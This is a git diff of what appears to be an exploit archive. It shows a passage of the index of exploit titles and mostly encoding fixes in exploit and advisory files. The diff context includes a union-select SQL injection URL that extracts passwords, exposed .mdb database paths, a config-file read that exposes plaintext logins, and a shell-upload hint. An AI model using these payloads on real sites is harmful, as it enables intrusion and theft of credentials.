Vulnerabilities",2015-04-08,LiquidWorm,php,webapps,80 +36676,platforms/php/webapps/36676.html,"Balero CMS 0.7.2 - Multiple JS/HTML Injection Vulnerabilities",2015-04-08,LiquidWorm,php,webapps,80 36677,platforms/php/webapps/36677.txt,"Wordpress Traffic Analyzer Plugin 3.4.2 - Blind SQL Injection",2015-04-08,"Dan King",php,webapps,80 36678,platforms/jsp/webapps/36678.txt,"ZENworks Configuration Management 11.3.1 - Remote Code Execution",2015-04-08,"Pedro Ribeiro",jsp,webapps,0 -36679,platforms/windows/remote/36679.rb,"Solarwinds Firewall Security Manager 6.6.5 Client Session Handling",2015-04-08,metasploit,windows,remote,0 +36679,platforms/windows/remote/36679.rb,"Solarwinds Firewall Security Manager 6.6.5 - Client Session Handling Vulnerability",2015-04-08,metasploit,windows,remote,0 36680,platforms/hardware/remote/36680.txt,"Multiple Trendnet Camera Products Remote Security Bypass Vulnerability",2012-02-10,console-cowboys,hardware,remote,0 36681,platforms/multiple/remote/36681.txt,"Apache MyFaces 'ln' Parameter Information Disclosure Vulnerability",2012-02-09,"Paul Nicolucci",multiple,remote,0 36682,platforms/php/dos/36682.php,"PHP PDORow Object Remote Denial Of Service Vulnerability",2011-09-24,anonymous,php,dos,0 @@ -33098,9 +33100,9 @@ id,file,description,date,author,platform,type,port 36687,platforms/php/webapps/36687.txt,"CubeCart <= 3.0.20 switch.php r Parameter Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps,0 36688,platforms/php/webapps/36688.html,"Zen Cart 1.3.9h 'path_to_admin/product.php' Cross Site Request Forgery Vulnerability",2012-02-10,DisK0nn3cT,php,webapps,0 36689,platforms/linux/webapps/36689.txt,"BOA Web Server 0.94.8.2 - Arbitrary File Access",2000-12-19,llmora,linux,webapps,0 -36690,platforms/linux/remote/36690.rb,"Barracuda Firmware <= 5.0.0.012 reporting Post Auth Remote Root",2015-04-09,xort,linux,remote,8000 +36690,platforms/linux/remote/36690.rb,"Barracuda Firmware <= 5.0.0.012 - Post Auth Remote Root exploit",2015-04-09,xort,linux,remote,8000 36691,platforms/php/webapps/36691.txt,"Wordpress Windows Desktop and iPhone Photo Uploader Plugin Arbitrary File Upload",2015-04-09,"Manish Tanwar",php,webapps,80 -36692,platforms/osx/local/36692.py,"Mac OS X < 10.7.5, 10.8.2, 10.9.5 10.10.2 - rootpipe Local Privilege Escalation",2015-04-09,"Emil Kvarnhammar",osx,local,0 +36692,platforms/osx/local/36692.py,"Mac OS X < 10.7.5_ 10.8.2_ 10.9.5 10.10.2 - rootpipe Local Privilege Escalation",2015-04-09,"Emil Kvarnhammar",osx,local,0 36693,platforms/php/webapps/36693.txt,"RabbitWiki 'title' Parameter Cross Site Scripting Vulnerability",2012-02-10,sonyy,php,webapps,0 36694,platforms/php/webapps/36694.txt,"eFront Community++ 3.6.10 SQL Injection and Multiple HTML Injection Vulnerabilities",2012-02-12,"Benjamin Kunz Mejri",php,webapps,0 36695,platforms/php/webapps/36695.txt,"Zimbra 'view' Parameter Cross Site Scripting Vulnerability",2012-02-13,sonyy,php,webapps,0 @@ -33144,24 +33146,23 @@ id,file,description,date,author,platform,type,port 36735,platforms/php/webapps/36735.txt,"Wordpress Duplicator <= 0.5.14 - SQL Injection & CSRF",2015-04-13,"Claudio Viviani",php,webapps,0 36736,platforms/php/webapps/36736.txt,"Traidnt Up 3.0 - SQL Injection",2015-04-13,"Ali Trixx",php,webapps,0 36738,platforms/php/webapps/36738.txt,"Wordpress N-Media Website Contact Form with File Upload 1.3.4 - Shell Upload Vulnerability",2015-04-13,"Claudio Viviani",php,webapps,0 +36746,platforms/linux/local/36746.c,"Apport/Abrt Local Root Exploit",2015-04-14,"Tavis Ormandy",linux,local,0 +36761,platforms/php/webapps/36761.txt,"WordPress MiwoFTP Plugin 1.0.5 CSRF Arbitrary File Deletion Exploit",2015-04-14,LiquidWorm,php,webapps,80 36741,platforms/linux/dos/36741.py,"Samba < 3.6.2 x86 - PoC",2015-04-13,sleepya,linux,dos,0 36742,platforms/linux/remote/36742.txt,"ProFTPd 1.3.5 - File Copy",2015-04-13,anonymous,linux,remote,0 36743,platforms/linux/dos/36743.c,"Linux Kernel splice() System Call - Local DoS",2015-04-13,"Emeric Nasi",linux,dos,0 36744,platforms/windows/remote/36744.rb,"Adobe Flash Player casi32 Integer Overflow",2015-04-13,metasploit,windows,remote,0 36745,platforms/osx/local/36745.rb,"Mac OS X ""Rootpipe"" Privilege Escalation",2015-04-13,metasploit,osx,local,0 -36746,platforms/linux/local/36746.c,"Apport/Abrt Local Root Exploit",2015-04-14,"Tavis Ormandy",linux,local,0 -36747,platforms/linux/local/36747.c,"Fedora abrt Race Condition Exploit",2015-04-14,"Tavis Ormandy",linux,local,0 -36751,platforms/php/webapps/36751.txt,"Wordpress Video Gallery 2.8 SQL Injection",2015-04-14,"Claudio Viviani",php,webapps,80 36752,platforms/php/webapps/36752.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_sensor.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36753,platforms/php/webapps/36753.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_time.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36754,platforms/php/webapps/36754.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_uaddr.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36751,platforms/php/webapps/36751.txt,"Wordpress Video Gallery 2.8 SQL Injection",2015-04-14,"Claudio Viviani",php,webapps,80 36755,platforms/php/webapps/36755.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_user.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36756,platforms/windows/remote/36756.html,"Samsung iPOLiS ReadConfigValue Remote Code Execution",2015-04-14,"Praveen Darshanam",windows,remote,0 36757,platforms/php/webapps/36757.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 index.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36758,platforms/php/webapps/36758.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 admin/base_useradmin.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36759,platforms/php/webapps/36759.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 admin/index.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36760,platforms/php/webapps/36760.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_ag_main.php Crafted File Upload Arbitrary Code Execution",2012-02-11,indoushka,php,webapps,0 -36761,platforms/php/webapps/36761.txt,"WordPress MiwoFTP Plugin 1.0.5 CSRF Arbitrary File Deletion Exploit",2015-04-14,LiquidWorm,php,webapps,80 36762,platforms/php/webapps/36762.txt,"WordPress MiwoFTP Plugin 1.0.5 Multiple CSRF XSS Vulnerabilities",2015-04-14,LiquidWorm,php,webapps,80 36763,platforms/php/webapps/36763.txt,"WordPress MiwoFTP Plugin 1.0.5 CSRF Arbitrary File Creation Exploit (RCE)",2015-04-14,LiquidWorm,php,webapps,80 36764,platforms/php/webapps/36764.txt,"SMW+ 1.5.6 'target' Parameter HTML Injection Vulnerability",2012-02-13,sonyy,php,webapps,0 @@ -33176,3 +33177,13 @@ id,file,description,date,author,platform,type,port 36773,platforms/windows/dos/36773.c,"Microsoft Window - HTTP.sys PoC (MS15-034)",2015-04-15,rhcp011235,windows,dos,0 36776,platforms/windows/dos/36776.py,"MS Windows (HTTP.sys) HTTP Request Parsing DoS (MS15-034)",2015-04-16,"laurent gaffie",windows,dos,80 36777,platforms/php/webapps/36777.txt,"Wordpress Ajax Store Locator 1.2 SQL Injection Vulnerability",2015-04-16,"Claudio Viviani",php,webapps,80 +36784,platforms/php/webapps/36784.txt,"11in1 CMS 1.2.1 - index.php class Parameter Traversal Local File Inclusion",2012-02-15,"High-Tech Bridge SA",php,webapps,0 +36785,platforms/php/webapps/36785.txt,"11in1 CMS 1.2.1 - admin/index.php class Parameter Traversal Local File Inclusion",2012-02-15,"High-Tech Bridge SA",php,webapps,0 +36786,platforms/php/webapps/36786.txt,"11in1 CMS 1.2.1 - Admin Password Manipulation CSRF",2012-02-15,"High-Tech Bridge SA",php,webapps,0 +36787,platforms/php/webapps/36787.txt,"LEPTON 1.1.3 - Cross Site Scripting",2012-02-15,"High-Tech Bridge SA",php,webapps,0 +36788,platforms/windows/dos/36788.txt,"Oracle Outside-In DOCX File Parsing Memory Corruption",2015-04-17,"Francis Provencher",windows,dos,0 +36789,platforms/php/dos/36789.php,"PHP 5.3.8 - Remote Denial Of Service Vulnerability",2011-12-18,anonymous,php,dos,0 +36790,platforms/php/webapps/36790.txt,"Tube Ace - 'q' Parameter Cross Site Scripting Vulnerability",2012-02-16,"Daniel Godoy",php,webapps,0 +36791,platforms/php/webapps/36791.txt,"CMS Faethon 1.3.4 - 'articles.php' Multiple SQL Injection Vulnerabilities",2012-02-16,tempe_mendoan,php,webapps,0 +36792,platforms/php/webapps/36792.txt,"Pandora FMS 4.0.1 - 'sec2' Parameter Local File Include Vulnerability",2012-02-17,"Ucha Gobejishvili",php,webapps,0 +36793,platforms/php/webapps/36793.txt,"ButorWiki 3.0 - 'service' Parameter Cross Site Scripting Vulnerability",2012-02-17,sonyy,php,webapps,0 diff --git a/platforms/aix/dos/33943.txt b/platforms/aix/dos/33943.txt index 4e8f0b759..84c49296b 100755 --- a/platforms/aix/dos/33943.txt +++ b/platforms/aix/dos/33943.txt @@ -44,10 +44,10 @@ High Technical Details & Description: ======================== 1. Arbitrary File Read (Unauthenticated) -Its possible to read any files from the server (with the applications users permissions) by a simple HTTP GET request. Flussonics web interface login information can be found as plaintext by reading /etc/flussonic/flussonic.conf; thus, its possible to login any Flussonic web interface using that method. +It’s possible to read any files from the server (with the application’s user’s permissions) by a simple HTTP GET request. Flussonic’s web interface login information can be found as plaintext by reading /etc/flussonic/flussonic.conf; thus, it’s possible to login any Flussonic web interface using that method. 2. Arbitrary Directory Listing (Authenticated) -Its possible to list any directories content sending a HTTP GET request to flussonic/api/list_files with the parameter subpath=directory. +It’s possible to list any directories’ content sending a HTTP GET request to “flussonic/api/list_files” with the parameter “subpath=directory”. Proof of Concept (PoC): @@ -105,9 +105,9 @@ X-Route-Time: 28 X-Run-Time: 8090 Content-Type: application/json -{files":[{"name":"X11","type":"directory"},{"name":"acpi","type":"directory"},{"name":"adduser.conf","type":"file","prefix":"vod"},{"name":"alternatives","type":"directory"},{"name":"apache2","type":"directory"},{"name":"apm","type":"directory"}, - -{name":"xml","type":"directory"},{"name":"zsh_command_not_found","type":"file","prefix":"vod"}]} +{“files":[{"name":"X11","type":"directory"},{"name":"acpi","type":"directory"},{"name":"adduser.conf","type":"file","prefix":"vod"},{"name":"alternatives","type":"directory"},{"name":"apache2","type":"directory"},{"name":"apm","type":"directory"}, +……… +{“name":"xml","type":"directory"},{"name":"zsh_command_not_found","type":"file","prefix":"vod"}]} Solution Fix & Patch: @@ -120,7 +120,7 @@ The risk of the vulnerabilities above estimated as high and medium. Credits & Authors: ============== -Bilgi Gvenlii Akademisi +Bilgi Güvenliði Akademisi Disclaimer & Information: =================== @@ -130,4 +130,4 @@ Domain: http://bga.com.tr/advisories.html Social: http://twitter.com/bgasecurity Contact: bilgi@bga.com.tr -Copyright 2014 | BGA \ No newline at end of file +Copyright © 2014 | BGA \ No newline at end of file diff --git a/platforms/aix/dos/34588.txt b/platforms/aix/dos/34588.txt index c471a5b7f..07a6da49f 100755 --- a/platforms/aix/dos/34588.txt +++ b/platforms/aix/dos/34588.txt @@ -1,9 +1,9 @@ # Exploit Title: PHP Stock Management System 1.02 - Multiple Vulnerabilty # Date : 9-9-2014 # Author : jsass -?# Vendor Homepage: ?http://www.posnic.com/? -# Software Link:? http://sourceforge.net/projects/stockmanagement/ -# Version: ?1.02 +​# Vendor Homepage: ​http://www.posnic.com/​ +# Software Link:​ http://sourceforge.net/projects/stockmanagement/ +# Version: ​1.02 # Tested on: kali linux # Twitter : @KwSecurity # Group : Q8 GRAY HAT TEAM diff --git a/platforms/aix/dos/35342.txt b/platforms/aix/dos/35342.txt index 2e243b36f..8e6af2054 100755 --- a/platforms/aix/dos/35342.txt +++ b/platforms/aix/dos/35342.txt @@ -43,7 +43,7 @@ function updateDataBase($robot, $nom, $actif, $user_agent, $ip1, $ip2, $detectio global $RS_LANG, $RS_LANGUE, $RS_TABLE_ROBOTS, $RS_DETECTION_USER_AGENT, $RS_DETECTION_IP; // dans tous les cas : - echo "

"; + echo "

 "; $msg = ""; // test du nom diff --git a/platforms/aix/remote/14456.c b/platforms/aix/remote/14456.c index 0947a96c3..815e5ae9e 100755 --- a/platforms/aix/remote/14456.c +++ b/platforms/aix/remote/14456.c @@ -9,7 +9,7 @@ * ---------------------------------------------------------------------------- * Description: - * The AIX 5l FTP-Server crashes when an overly long NLST command is supplied - - * For example: NLST ~AAAAA...A (2000 As should be enough) - + * For example: NLST ~AAAAA...A (2000 A´s should be enough) - * The fun part here is that it creates a coredump file in the current - * directory if it is set writable by the logged in user. - * The goal of the exploit is to get the DES encrypted user hashes - diff --git a/platforms/aix/webapps/11580.txt b/platforms/aix/webapps/11580.txt index fbf5db870..dadcbd759 100755 --- a/platforms/aix/webapps/11580.txt +++ b/platforms/aix/webapps/11580.txt @@ -1,16 +1,16 @@ ============================================================================== - [] Thx To : [ Jiko ,H.Scorpion ,Dr.Bahy ,T3rr0rist ,Golden-z3r0 ,Shr7 Team . ] + [»] Thx To : [ Jiko ,H.Scorpion ,Dr.Bahy ,T3rr0rist ,Golden-z3r0 ,Shr7 Team . ] ============================================================================== - [] FileExecutive Multiple Vulnerabilities + [»] FileExecutive Multiple Vulnerabilities ============================================================================== - [] Script: [ FileExecutive v1.0.0 ] - [] Language: [ PHP ] - [] Site page: [ FileExecutive is a web-based file manager written in PHP. ] - [] Download: [ http://sourceforge.net/projects/fileexecutive/ ] - [] Founder: [ ViRuSMaN ] - [] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & Islam-Defenders.Org ] - [] My Home: [ HackTeach.Org , Islam-Attack.Com ] + [»] Script: [ FileExecutive v1.0.0 ] + [»] Language: [ PHP ] + [»] Site page: [ FileExecutive is a web-based file manager written in PHP. ] + [»] Download: [ http://sourceforge.net/projects/fileexecutive/ ] + [»] Founder: [ ViRuSMaN ] + [»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & Islam-Defenders.Org ] + [»] My Home: [ HackTeach.Org , Islam-Attack.Com ] ########################################################################### @@ -54,23 +54,23 @@ Add/Edit Admin CSRF: Upload Rename Delete Edit Download Chmod -Move - +Move   +  Shell Upload: - [] By Go To The End Of Page & Browse Your Shell 2 upload it <-=- Remote File Upload Vulnerability + [»] By Go To The End Of Page & Browse Your Shell 2 upload it <-=- Remote File Upload Vulnerability Local File Disclosure: - [] http://localhost/[path]/download.php?file=./LFD <-=- Local File Disclosure Vulnerability + [»] http://localhost/[path]/download.php?file=./LFD <-=- Local File Disclosure Vulnerability Full Path Disclosure: - [] http://localhost/[path]/listdir.php?dir=./FPD <-=- Full Path Disclosure Vulnerability + [»] http://localhost/[path]/listdir.php?dir=./FPD <-=- Full Path Disclosure Vulnerability Author: ViRuSMaN <- diff --git a/platforms/aix/webapps/14058.html b/platforms/aix/webapps/14058.html index a687c95aa..7359241c6 100755 --- a/platforms/aix/webapps/14058.html +++ b/platforms/aix/webapps/14058.html @@ -69,12 +69,12 @@ http://Target.com/includes/FCKeditor/editor/filemanager/browser/default/connecto - +    Current Folder
- +    Resource Type
@@ -96,16 +96,16 @@ Resource Type
Get Folders - +    Get Folders and Files - +    Create Folder - +   

@@ -138,7 +138,7 @@ height="100%"> [~] Special Thanks To My Best FriendS : -NetQard , B3hz4d , Raiden , ~[ CriMe ]~ , CoNstaNtine , _R3v4l_ , +NetQard , B3hz4d , Raiden , ~[ CriMe ]~ , † CoNstaNtine † , _R3v4l_ , ~~XTerror~~ , __l2o5v4__ , Zend [~] IRANIAN Young HackerZ diff --git a/platforms/aix/webapps/21319.txt b/platforms/aix/webapps/21319.txt index fe3914d46..ba6c2a6e1 100755 --- a/platforms/aix/webapps/21319.txt +++ b/platforms/aix/webapps/21319.txt @@ -8,7 +8,7 @@ # CVE : CVE-2012-2995, CVE-2012-2996 # Software Description -# TrendMicro Interscan Messaging Security is the industrys most comprehensive +# TrendMicro Interscan Messaging Security is the industry’s most comprehensive # mail gateway security. Choose state-of-the-art software or a hybrid solution # with on-premise virtual appliance and optional cloud pre-filter that blocks # the vast majority of spam and malware outside your network. Plus our Data diff --git a/platforms/aix/webapps/33736.php b/platforms/aix/webapps/33736.php index 36e5c1344..4c07719e2 100755 --- a/platforms/aix/webapps/33736.php +++ b/platforms/aix/webapps/33736.php @@ -8,37 +8,37 @@ /* -???????????????????????????? -?____________________? -?________________? -?_____________? -?___________? -?________________? -?________________? -?_________________? -?_______________? -?______________? -?______________? -?_______________? -?_______________? -?_______________? -?________________? -?________________? -?______________? -?________________? -?___________________? -???????????????????????????? +████████████████████████████ +█______¶¶¶¶¶¶______________█ +█____¶¶¶¶¶¶¶¶¶¶____________█ +█___¶¶¶¶¶¶¶¶¶¶¶¶¶__________█ +█__¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶_________█ +█_¶¶¶¶¶¶¶______¶¶¶_________█ +█_¶¶¶¶¶¶________¶¶__¶¶_____█ +█_¶¶¶¶¶¶____________¶¶¶____█ +█_¶¶¶¶¶_____________¶¶¶¶¶¶_█ +█_¶¶¶¶¶____________¶¶¶¶¶¶¶_█ +█_¶¶¶¶¶___________¶¶¶¶¶¶¶__█ +█_¶¶¶¶¶____________¶¶¶¶¶¶__█ +█_¶¶¶¶¶_____________¶¶¶¶¶¶_█ +█_¶¶¶¶¶¶____________¶¶¶_¶¶_█ +█__¶¶¶¶¶¶______¶¶___¶¶_____█ +█__¶¶¶¶¶¶¶____¶¶¶__________█ +█___¶¶¶¶¶¶¶¶¶¶¶¶___________█ +█____¶¶¶¶¶¶¶¶¶¶____________█ +█_____¶¶¶¶¶¶¶______________█ +████████████████████████████ Plesk SSO XXE injection (Old bug) Exploit Coded by z00 (electrocode) Twitter: electrocode -Not: Tor kurulu de?ilse proxy kismini kaldirin +Not: Tor kurulu değilse proxy kismini kaldirin Bug founded http://makthepla.net/blog/=/plesk-sso-xxe-xss -Tm ?slam Aleminin Beraat gecesi mubarek olsun dua edin:) +Tüm İslam Aleminin Beraat gecesi mubarek olsun dua edin:) */ function Gonder($domain,$komut,$method){ diff --git a/platforms/android/dos/35913.txt b/platforms/android/dos/35913.txt index 2f8734e68..f3446d961 100755 --- a/platforms/android/dos/35913.txt +++ b/platforms/android/dos/35913.txt @@ -227,7 +227,7 @@ Android 4.2.2. /----- I/p2p_supplicant( 2832): P2P-DEVICE-FOUND 00.EF.00 -p2p_dev_addr=00.EF.00 pri_dev_type=10-0050F204-5 'fa' +p2p_dev_addr=00.EF.00 pri_dev_type=10-0050F204-5 'fa¬¬' config_methods=0x188 dev_capab=0x21 group_capab=0x0 E/AndroidRuntime( 2129): !@*** FATAL EXCEPTION IN SYSTEM PROCESS: WifiMonitor diff --git a/platforms/android/remote/35637.py b/platforms/android/remote/35637.py index 6cda8fd77..09fd4bc57 100755 --- a/platforms/android/remote/35637.py +++ b/platforms/android/remote/35637.py @@ -104,4 +104,4 @@ def main(phone): password = base64.b64decode(password) # Custom message that will crash WhatsApp - message = message = "#RemoteExecution? \ No newline at end of file + message = message = "#RemoteExecution \ No newline at end of file diff --git a/platforms/asp/webapps/10425.txt b/platforms/asp/webapps/10425.txt index 0e25e96ef..930726c67 100755 --- a/platforms/asp/webapps/10425.txt +++ b/platforms/asp/webapps/10425.txt @@ -31,6 +31,6 @@ ## I Love You **** ## ##################################################################### - aFiR.Me - 0nly F0r Security 2009 | By Mr.aFiR +© aFiR.Me - 0nly F0r Security 2009 | By Mr.aFiR // Exploit End. \ No newline at end of file diff --git a/platforms/asp/webapps/10455.txt b/platforms/asp/webapps/10455.txt index fdd37051c..a64744998 100755 --- a/platforms/asp/webapps/10455.txt +++ b/platforms/asp/webapps/10455.txt @@ -1,25 +1,25 @@ =========================================================================== === -[] ~ Note : Hacker R0x Lamerz Sux ! +[»] ~ Note : Hacker R0x Lamerz Sux ! =========================================================================== === -[] DesigNsbyjm Cms <== 1.0 (PageId) Remote SQL Injection +[»] DesigNsbyjm Cms <== 1.0 (PageId) Remote SQL Injection Vulnerability =========================================================================== === -[] my home: [ Hackteach.org ] -[] Script: [ DesigNsbyjm Cms 1.0 ] -[] Language: [ PHP ] -[] Home: [ http://designsbyjm.net/ ] -[] Founder: [ Red-D3v1L < No Email :d < ] -[] Gr44tz to: [ Hackteach Team - H1s0k4 - SkuLL-HaCkEr +[»] my home: [ Hackteach.org ] +[»] Script: [ DesigNsbyjm Cms 1.0 ] +[»] Language: [ PHP ] +[»] Home: [ http://designsbyjm.net/ ] +[»] Founder: [ Red-D3v1L < No Email :d < ] +[»] Gr44tz to: [ Hackteach Team - H1s0k4 - SkuLL-HaCkEr - sec-r1z.com - 0d4y.com ] -[] Fuck to : [ Gaza 5acker << Big Big Big Lamerz ] +[»] Fuck to : [ Gaza 5acker << Big Big Big Lamerz ] ######################################################################## ===[ Exploit SQL ]=== -[] [Path]/viewcontent.asp?pageid=[SQL] +[»] [Path]/viewcontent.asp?pageid=[SQL] http://server/viewcontent.asp?pageid=-9+union+select+1,2,3,4, password,6,username,8,9,10,11,12,13+from+user diff --git a/platforms/asp/webapps/10470.txt b/platforms/asp/webapps/10470.txt index e1d971362..35573a4ad 100755 --- a/platforms/asp/webapps/10470.txt +++ b/platforms/asp/webapps/10470.txt @@ -20,10 +20,10 @@ ===[ Exploit SQL Bypass ]=== - [] Go to : [Path]/admin + [»] Go to : [Path]/admin - [] Add : siteConfig.asp + [»] Add : siteConfig.asp - [] dem0 : + [»] dem0 : http://server/admin/siteConfig.asp \ No newline at end of file diff --git a/platforms/asp/webapps/10482.txt b/platforms/asp/webapps/10482.txt index b4a53c46e..8eb7846b3 100755 --- a/platforms/asp/webapps/10482.txt +++ b/platforms/asp/webapps/10482.txt @@ -7,22 +7,22 @@ ============================================================================== - [] ~ Note : Thx 2 Egyptian National Team + [»] ~ Note : Thx 2 Egyptian National Team ============================================================================== - [] Codefixer Membership Remote Database Disclosure Vulnerability + [»] Codefixer Membership Remote Database Disclosure Vulnerability ============================================================================== - [] Script: [ Codefixer Membership ] - [] Language: [ ASP ] - [] Site page: [ ASP membership management script system ] - [] Founder: [ ViRuSMaN ] - [] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ] - [] My Home: [ HackTeach.Org , Islam-Attack.Com ] + [»] Script: [ Codefixer Membership ] + [»] Language: [ ASP ] + [»] Site page: [ ASP membership management script system ] + [»] Founder: [ ViRuSMaN ] + [»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ] + [»] My Home: [ HackTeach.Org , Islam-Attack.Com ] ########################################################################### ===[ Exploit ]=== - [] http://[target].com/[path]/members.mdb + [»] http://[target].com/[path]/members.mdb Author: ViRuSMaN <- \ No newline at end of file diff --git a/platforms/asp/webapps/10483.txt b/platforms/asp/webapps/10483.txt index 7ebd5e8ca..4b383405d 100755 --- a/platforms/asp/webapps/10483.txt +++ b/platforms/asp/webapps/10483.txt @@ -7,24 +7,24 @@ ============================================================================== - [] ~ Note : Thx 2 Egyptian National Team + [»] ~ Note : Thx 2 Egyptian National Team ============================================================================== - [] Free ASP GuestBookPro Script Remote Database Disclosure Vulnerability + [»] Free ASP GuestBookPro Script Remote Database Disclosure Vulnerability ============================================================================== - [] Script: [ GuestBookPro ] - [] Language: [ ASP ] - [] Site page: [ Codefixer GuestBookPro - Free ASP GuestBook Script ] - [] Download: [ http://www.codefixer.com/app_guestbookpro/default.asp ] - [] Founder: [ ViRuSMaN ] - [] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ] - [] My Home: [ HackTeach.Org , Islam-Attack.Com ] + [»] Script: [ GuestBookPro ] + [»] Language: [ ASP ] + [»] Site page: [ Codefixer GuestBookPro - Free ASP GuestBook Script ] + [»] Download: [ http://www.codefixer.com/app_guestbookpro/default.asp ] + [»] Founder: [ ViRuSMaN ] + [»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ] + [»] My Home: [ HackTeach.Org , Islam-Attack.Com ] ########################################################################### ===[ Exploit ]=== - [] http://[target].com/[path]/db/guestbook.mdb + [»] http://[target].com/[path]/db/guestbook.mdb Author: ViRuSMaN <- \ No newline at end of file diff --git a/platforms/asp/webapps/10558.txt b/platforms/asp/webapps/10558.txt index efe0225a3..3cc8b4769 100755 --- a/platforms/asp/webapps/10558.txt +++ b/platforms/asp/webapps/10558.txt @@ -7,24 +7,24 @@ ============================================================================== - [] ~ Note : Thx 2 Egyptian National Team + [»] ~ Note : Thx 2 Egyptian National Team ============================================================================== - [] Toast Forums v1.8 Database Disclosure Vulnerability + [»] Toast Forums v1.8 Database Disclosure Vulnerability ============================================================================== - [] Script: [ Toast Forums v1.8 ] - [] Language: [ ASP ] - [] Site page: [ Toast Forums World's first user-skinnable message board! ] - [] Download: [ http://www.toastforums.com/download/ ] - [] Founder: [ ViRuSMaN ] - [] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ] - [] My Home: [ HackTeach.Org , Islam-Attack.Com ] + [»] Script: [ Toast Forums v1.8 ] + [»] Language: [ ASP ] + [»] Site page: [ Toast Forums World's first user-skinnable message board! ] + [»] Download: [ http://www.toastforums.com/download/ ] + [»] Founder: [ ViRuSMaN ] + [»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ] + [»] My Home: [ HackTeach.Org , Islam-Attack.Com ] ########################################################################### ===[ Exploit ]=== - [] http://[target].com/[path]/data/data.mdb + [»] http://[target].com/[path]/data/data.mdb diff --git a/platforms/asp/webapps/10576.txt b/platforms/asp/webapps/10576.txt index 3bc132993..f17ea3460 100755 --- a/platforms/asp/webapps/10576.txt +++ b/platforms/asp/webapps/10576.txt @@ -16,23 +16,23 @@ ============================================================================== - [] ~ Note : Forever RevengeHack.Com + [»] ~ Note : Forever RevengeHack.Com ============================================================================== - [] Angelo-emlak v1.0 Database Disclosure Vulnerability + [»] Angelo-emlak v1.0 Database Disclosure Vulnerability ============================================================================== - [] Script: [ angelo-emlak v1.0 ] + [»] Script: [ angelo-emlak v1.0 ] - [] Language: [ ASP ] + [»] Language: [ ASP ] - [] Founder: [ LionTurk - Bylionturk@kafam1milyon.com (Mail Gonderenin aq... :D ] + [»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com (Mail Gonderenin aq... :D ] - [] My Home: [ RevengeHack.com , Ar-ge.Org] + [»] My Home: [ RevengeHack.com , Ar-ge.Org] @@ -44,12 +44,12 @@ - [] http://[target].com/[path]/veribaze/angelo.mdb + [»] http://[target].com/[path]/veribaze/angelo.mdb - [] ( c ) DesignAndCodeBy:Angelo + [»] ( c ) DesignAndCodeBy:Angelo @@ -62,7 +62,7 @@ Thanks You: eXceptioN,CodeInside,CorDoN,Hack3ra,Rex aL0ne,By_HKC Ve By_Magic :D -- Kaderimiz olan aka deil de akyla kaderimizi deitirene ielim! +- Kaderimiz olan aþka deðil de aþkýyla kaderimizi deðiþtirene içelim! diff --git a/platforms/asp/webapps/10637.txt b/platforms/asp/webapps/10637.txt index 06aa2e056..3fd382f55 100755 --- a/platforms/asp/webapps/10637.txt +++ b/platforms/asp/webapps/10637.txt @@ -7,24 +7,24 @@ ============================================================================== - [] ~ Note : Some sites may change the path of the "database/NewsPad.mdb" cause the vulnerability not work + [»] ~ Note : Some sites may change the path of the "database/NewsPad.mdb" cause the vulnerability not work ============================================================================== - [] Web Wiz NewsPad Remote Database Disclosure Vulnerability + [»] Web Wiz NewsPad Remote Database Disclosure Vulnerability ============================================================================== - [] Script: [ Web Wiz NewsPad ] - [] Language: [ ASP ] - [] Site page: [ Web Wiz NewsPad - Free eNewsletter Software Download ] - [] Download: [ http://www.webwizguide.com/webwiznewspad/downloads.asp ] - [] Founder: [ ViRuSMaN ] - [] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com , Sec-r1z.com ] - [] My Home: [ HackTeach.Org , Islam-Attack.Com ] + [»] Script: [ Web Wiz NewsPad ] + [»] Language: [ ASP ] + [»] Site page: [ Web Wiz NewsPad - Free eNewsletter Software Download ] + [»] Download: [ http://www.webwizguide.com/webwiznewspad/downloads.asp ] + [»] Founder: [ ViRuSMaN ] + [»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com , Sec-r1z.com ] + [»] My Home: [ HackTeach.Org , Islam-Attack.Com ] ########################################################################### ===[ Exploit ]=== - [] http://[target].com/[path]/database/NewsPad.mdb + [»] http://[target].com/[path]/database/NewsPad.mdb Author: ViRuSMaN <- diff --git a/platforms/asp/webapps/10638.txt b/platforms/asp/webapps/10638.txt index 8e8cff277..f2108b20a 100755 --- a/platforms/asp/webapps/10638.txt +++ b/platforms/asp/webapps/10638.txt @@ -7,25 +7,25 @@ ============================================================================== - [] ~ Note : Some forums may change the path of the "database/wwForum.mdb" cause the vulnerability not work + [»] ~ Note : Some forums may change the path of the "database/wwForum.mdb" cause the vulnerability not work ============================================================================== - [] Web Wiz Forums v9.64 Remote Database Disclosure Vulnerability + [»] Web Wiz Forums v9.64 Remote Database Disclosure Vulnerability ============================================================================== - [] Script: [ Web Wiz Forums v9.64 ] - [] Language: [ ASP ] - [] Site page: [ Web Wiz Forums - 